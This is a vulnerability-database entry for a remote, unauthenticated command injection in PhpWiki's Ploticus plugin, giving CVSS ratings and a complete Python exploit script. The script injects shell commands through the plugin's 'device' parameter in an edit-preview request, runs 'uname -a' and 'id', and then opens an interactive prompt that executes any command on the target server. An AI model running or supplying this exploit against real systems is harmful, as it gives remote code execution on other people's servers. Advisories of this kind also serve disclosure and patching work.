PhpWiki Ploticus Command Injection

2014-08-29 / 2014-09-20
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################### # ____ __ _ __ _ # / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_) # / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / # / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / #/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ # /_/ /_/ /_/ # Diskovered in Nov/Dec 2011 ############################################################### import urllib import urllib2 import sys def banner(): print " ____ __ _ __ _ " print " / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)" print " / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / " print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / " print " /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ " print " /_/ /_/ /_/ \n" def usage(): banner() print " [+] Usage example" print " [-] python " + sys.argv[0] + " http://path.to/wiki" if len(sys.argv)< 2: usage() quit() domain = sys.argv[1] def commandexec(cmd): data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')]) cmd1 = urllib2.Request(domain +'/index.php/HeIp',data) cmd2 = urllib2.urlopen(cmd1) output = cmd2.read() firstloc = output.find("123:::\n") + len("123:::\n") secondloc = output.find("\n:::123") return output[firstloc:secondloc] banner() print commandexec('uname -a') print commandexec('id') while(quit != 1): cmd = raw_input('Run a command: ') if cmd == 'quit': print "[-] Hope you had fun :)" quit = 1 if cmd != 'quit': print commandexec(cmd)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top